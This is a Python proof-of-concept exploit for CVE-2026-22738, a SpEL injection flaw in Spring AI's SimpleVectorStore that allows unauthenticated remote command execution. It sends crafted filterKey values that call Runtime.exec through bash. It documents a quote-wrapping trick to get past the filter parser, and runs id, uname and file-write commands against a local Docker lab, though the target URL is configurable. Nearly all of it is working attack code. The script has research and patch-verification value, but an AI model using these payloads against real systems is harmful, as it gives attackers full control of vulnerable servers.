#!/usr/bin/env python3 """ CVE-2026-22738 — SpEL Injection RCE in Spring AI SimpleVectorStore CVSS 9.8 CRITICAL | CWE-94 / CWE-917 Affected: org.springframework.ai:spring-ai-core 1.0.0–1.0.4, 1.1.0-M1–1.1.3 Fixed: Spring AI 1.0.5 / 1.1.4 (commit ba9220b22383e430d5f801ce8e4fa01cf9e75f29) Technique ───────── SimpleVectorStore.similaritySearch() passes the user-supplied filter key name verbatim into a SpEL template evaluated by StandardEvaluationContext. StandardEvaluationContext exposes the full JVM reflection API, so injecting T(java.lang.Runtime).getRuntime().exec(...) into the filter key achieves unauthenticated OS command execution. Key bypass detail (from exploit research): • Naïve single-quote injection fails because the filter text parser treats a key starting with ' as a quoted string and strips the outer quotes. • Wrapping the payload in double quotes ("...") causes the parser to strip the outer double quotes, leaving the inner content (starting/ending with ') to be used verbatim as the SpEL key via #metadata['']. • Using #metadata[''] on both sides (instead of undefined foo[...]) avoids an "unknown variable" SpEL error while still triggering exec(). Success indicator: • HTTP response body contains "EL1030E" — the SpEL runtime error "operator ADD not supported between null and java.lang.ProcessImpl". This error is raised AFTER exec() returns, confirming OS-level execution. Usage ───── pip install requests python3 exploit.py [--target http://localhost:8082] For Docker Desktop (macOS/Windows) callback payloads, use host.docker.internal instead of 127.0.0.1 as the callback IP. """ import argparse import subprocess import sys import time try: import requests except ImportError: print("[!] Missing dependency — run: pip install requests") sys.exit(1) # ── Constants ────────────────────────────────────────────────────────────────── CONTAINER_NAME = "cve-2026-22738-lab" # must match docker-compose container_name PROOF_FILE = "/tmp/pwned_cve_2026_22738" RCE_PROOF_FILE = "/tmp/rce_proof.txt" # SpEL error raised after exec() returns — reliable OOB-free confirmation of RCE RCE_INDICATOR = "EL1030E" BANNER = """ ╔══════════════════════════════════════════════════════════════════╗ ║ CVE-2026-22738 — Spring AI SpEL Injection → RCE ║ ║ CVSS 9.8 CRITICAL | No Auth | No Interaction ║ ║ Affected: Spring AI SimpleVectorStore 1.0.0–1.0.4 ║ ╚══════════════════════════════════════════════════════════════════╝""" # ── Payload helpers ──────────────────────────────────────────────────────────── def spel_filter_key(cmd: str) -> str: """ Build the SpEL injection filterKey parameter value. The application concatenates filterKey into the filter expression string: filterExpr = filterKey + " == '" + filterValue + "'" With our payload the expression becomes: "'] + T(java.lang.Runtime).getRuntime().exec(new String[]{...}) + #metadata['" == 'x' The filter text parser strips the outer double-quotes and passes the inner content to doKey(), which embeds it into: #metadata[''] + T(java.lang.Runtime)...exec(...) + #metadata[''] == 'x' StandardEvaluationContext evaluates this, exec() fires, then SpEL throws EL1030E (can't ADD null + ProcessImpl) — that error is our success indicator. IMPORTANT: cmd must not contain single quotes (they would break the SpEL string). For commands with single-quoted arguments, base64-encode and decode inline. """ return ( f'''"'] + T(java.lang.Runtime).getRuntime().exec(''' f'''new String[]{{'/bin/bash','-c','{cmd}'}}) + #metadata['"''' ) def spel_read_property(prop: str) -> str: """Blind probe payload — reads a JVM system property (no OS exec needed).""" return f'''"'] + T(java.lang.System).getProperty('{prop}') + #metadata['"''' # ── Individual exploit steps ─────────────────────────────────────────────────── def step_baseline(session: requests.Session, target: str) -> bool: """Step 1 — confirm the endpoint is reachable and the seeded document is returned.""" print("\n[*] Step 1 — Baseline check (filterKey=country, filterValue=US)") try: resp = session.get( f"{target}/search", params={"filterKey": "country", "filterValue": "US", "query": "hello"}, timeout=15, ) except requests.ConnectionError as e: print(f" ✗ Connection refused: {e}") return False if resp.status_code == 200 and ("country" in resp.text or "US" in resp.text or "Hello" in resp.text): print(f" ✓ Endpoint reachable — seeded document returned (HTTP {resp.status_code})") return True print(f" ✗ Unexpected response (HTTP {resp.status_code}): {resp.text[:300]}") return False def step_spel_probe(session: requests.Session, target: str) -> bool: """Step 2 — blind SpEL probe to confirm the injection point is reached.""" print("\n[*] Step 2 — SpEL probe (read java.version via T(java.lang.System))") payload = spel_read_property("java.version") resp = session.get( f"{target}/search", params={"filterKey": payload, "filterValue": "x", "query": "hello"}, timeout=15, ) # SpEL evaluation error (500) or clean response (200) — both confirm evaluation happened if resp.status_code in (200, 500): print(f" ✓ SpEL expression reached the evaluator (HTTP {resp.status_code})") if "21" in resp.text or "17" in resp.text or "java" in resp.text.lower(): print(f" ✓ Java version string visible in response body") return True print(f" ? Unexpected status {resp.status_code}: {resp.text[:200]}") return False def step_rce_touch(session: requests.Session, target: str) -> bool: """Step 3 — RCE: create /tmp/pwned_cve_2026_22738 inside the container.""" print(f"\n[*] Step 3 — RCE: touch {PROOF_FILE}") cmd = f"touch {PROOF_FILE}" resp = session.get( f"{target}/search", params={"filterKey": spel_filter_key(cmd), "filterValue": "x", "query": "hello"}, timeout=15, ) if RCE_INDICATOR in resp.text: print(f" ✓ {RCE_INDICATOR} in response — Runtime.exec() was invoked (process spawned)") return True print(f" ? Response (HTTP {resp.status_code}): {resp.text[:300]}") # Still return True if we get a 500 with any error — execution may have happened return resp.status_code == 500 def step_rce_id(session: requests.Session, target: str) -> bool: """Step 4 — RCE: write id/uname/hostname to /tmp/rce_proof.txt.""" print(f"\n[*] Step 4 — RCE: capture id + uname + hostname → {RCE_PROOF_FILE}") # Chained commands — must not use single quotes inside the payload cmd = ( f"id > {RCE_PROOF_FILE} && " f"uname -a >> {RCE_PROOF_FILE} && " f"cat /etc/hostname >> {RCE_PROOF_FILE}" ) resp = session.get( f"{target}/search", params={"filterKey": spel_filter_key(cmd), "filterValue": "x", "query": "hello"}, timeout=15, ) if RCE_INDICATOR in resp.text: print(f" ✓ {RCE_INDICATOR} detected — command dispatched") return True print(f" ? HTTP {resp.status_code}: {resp.text[:200]}") return False def step_verify_docker() -> bool: """Step 5 — read proof files from inside the container via docker exec.""" print("\n[*] Step 5 — Verifying via docker exec") time.sleep(1) # give the spawned bash process a moment to finish writing # ── Check the touch file ────────────────────────────────────────────────── try: r = subprocess.run( ["docker", "exec", CONTAINER_NAME, "ls", "-la", PROOF_FILE], capture_output=True, text=True, timeout=10, ) if r.returncode == 0: print(f" ✓ Proof file present: {r.stdout.strip()}") else: print(f" ✗ Proof file missing: {r.stderr.strip()}") except FileNotFoundError: print(" ! 'docker' binary not in PATH — skipping file check") return False except subprocess.TimeoutExpired: print(" ! docker exec timed out") return False # ── Read id / uname output ──────────────────────────────────────────────── try: r = subprocess.run( ["docker", "exec", CONTAINER_NAME, "cat", RCE_PROOF_FILE], capture_output=True, text=True, timeout=10, ) if r.returncode == 0 and r.stdout.strip(): print(f"\n{'='*62}") print(" RCE PROOF (executed inside the container):") print(f"{'='*62}") for line in r.stdout.strip().splitlines(): print(f" {line}") print(f"{'='*62}") return "uid=" in r.stdout else: print(f" ✗ Could not read {RCE_PROOF_FILE}: {r.stderr.strip()}") return False except subprocess.TimeoutExpired: print(" ! docker exec timed out while reading proof file") return False # ── Main ─────────────────────────────────────────────────────────────────────── def wait_for_ready(target: str, timeout_s: int = 120) -> bool: """Poll /search?filterKey=country&filterValue=US until the app responds (or timeout).""" deadline = time.time() + timeout_s print(f"[*] Waiting for app to be ready at {target} (up to {timeout_s}s) …", end="", flush=True) while time.time() < deadline: try: r = requests.get( f"{target}/search", params={"filterKey": "country", "filterValue": "US"}, timeout=5, ) if r.status_code in (200, 500): print(" ready!") return True except Exception: pass print(".", end="", flush=True) time.sleep(3) print(" TIMEOUT") return False def main(): parser = argparse.ArgumentParser( description="CVE-2026-22738 PoC — SpEL RCE in Spring AI SimpleVectorStore" ) parser.add_argument( "--target", default="http://localhost:8082", help="Base URL of the vulnerable app (default: http://localhost:8082). " "Inside Docker use http://host.docker.internal:8082", ) parser.add_argument( "--wait", action="store_true", help="Poll the target until it is ready before exploiting (useful right after 'docker compose up')", ) args = parser.parse_args() target = args.target.rstrip("/") print(BANNER) print(f"Target: {target}\n") session = requests.Session() if args.wait: if not wait_for_ready(target): print("[!] Target never became ready. Exiting.") sys.exit(1) # ── Run steps ───────────────────────────────────────────────────────────── if not step_baseline(session, target): print("\n[!] Baseline failed — is the container running?") print(f" Try: docker compose up -d --build (then retry with --wait)") sys.exit(1) step_spel_probe(session, target) rce_ok = step_rce_touch(session, target) step_rce_id(session, target) verified = step_verify_docker() # ── Final verdict ───────────────────────────────────────────────────────── print() if rce_ok and verified: print("✅ EXPLOIT SUCCEEDED — full unauthenticated RCE confirmed (running as root)") elif rce_ok: print("⚠️ EXPLOIT LIKELY SUCCEEDED — EL1030E received but docker verify was skipped") print(f" Manual check: docker exec {CONTAINER_NAME} cat {RCE_PROOF_FILE}") else: print("❌ EXPLOIT FAILED — check that the target is running Spring AI 1.0.0–1.0.4") if __name__ == "__main__": main()